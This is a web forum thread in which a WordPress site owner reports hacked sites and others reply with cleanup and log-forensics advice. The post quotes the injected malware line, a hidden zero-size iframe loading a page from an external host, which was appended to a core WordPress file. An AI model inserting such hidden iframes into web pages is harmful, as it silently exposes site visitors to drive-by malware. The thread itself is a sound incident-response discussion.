All my wordpress sites underattack 3.0.1 (different servers) XSS I think

Hello two of my sites were attacked by malicious script and are now down. These two wordpress sites have been injected by this code

<iframe frameborder="0" height="0" name="frame1" scrolling="no" src="http://<snip/>:8080/home/1/" width="0"></iframe>

the file which was infected was under wp-includes/default-widgets.php last line had this code my site is already been banned by firefox today what should I do Please help me I want to prevent my site anyone else facing similar problem

Check this page

I am now seeing that nearly all files have been infected including index.php

  1. Clean up all infected files
  2. Install/upgrade to the latest version
  3. Update all passwords including your hosting control panel, FTP and WP logins
  4. Contact your host to see if they can identify how the attack took place, just in case it’s a weak server setup

…and update your Wordpress installation regularly to make sure you are fully patched :slight_smile:

This could be from any number of sources. The link you provide probably isn’t how they got into your website.

However, if you have phpMyAdmin on your site, or osCommerce, Openx, or any number of other software programs, then you should have them updated - immediately. We’ve been seeing a number of attacks against standard software on websites.

If you have your access logs, look in them for a series of 404 errors where someone is scanning your site and looking for where software is installed. See what file they’re looking for then do a search on that log file to see when it returns a 200 - meaning they found it. Usually that datetime stamp will be close to when your site was hacked.

Although, if the hackers uploaded a shell, you can’t base your search on datetime stamps. Many of the shells we’ve been seeing have the ability to change the datetime stamp of files - to further hide their work.